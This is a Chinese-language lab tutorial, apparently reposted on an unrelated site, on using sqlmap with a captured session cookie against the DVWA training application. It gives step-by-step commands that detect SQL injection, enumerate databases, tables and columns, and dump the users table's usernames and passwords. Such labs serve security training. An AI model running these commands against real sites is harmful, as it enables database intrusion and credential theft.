SQLMAP进阶使用 --cookie

实验原理

Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要,用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie 的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。

1.访问DVWA网站

1)访问dvwa,并登录。admin password

2) 登录后,在左侧菜单点击“DVWA Security”,将DVWA网站的安全级别设为“Low”,并点击Submt

3)左侧菜单点击“SQL Injection”模块,进入SQL注入训练模块

2.利用Burpsuite工具抓包

1)启动Burpsuite并设置代理服务端口

2)设置Firefox代理

注意:端口要一致

3)开启 Burpsuite的代理拦截功能

4)利用Burpsuite工具拦截HTTP请求包

进入DVWA网站SQL注入训练模块,输入1,点击Submit,此时Burpsuite会拦截到HTTP请求包

将其中的cookie值拷贝下来,作为下一步为SQLMAP的 --cookie参数赋值

3.启动SQLMAP

进入sqlmap目录,在搜索框输入cmd,并回车

4.寻找注入点

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4"

检测结果

5.获取数据库的库名

1)获取所有数据库的库名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" --dbs

2)获取当前数据库的库名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" --current-db

6.获取dvwa数据库中所有的表名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa --tables

其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa -T users --columns

8.获取users表中user和password字段的全部值

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa -T users -C user,password --dump

最新发表
友情链接

Copyright © 2022 篮球世界杯_世界杯亚洲区名额 - cdbnfc.com All Rights Reserved.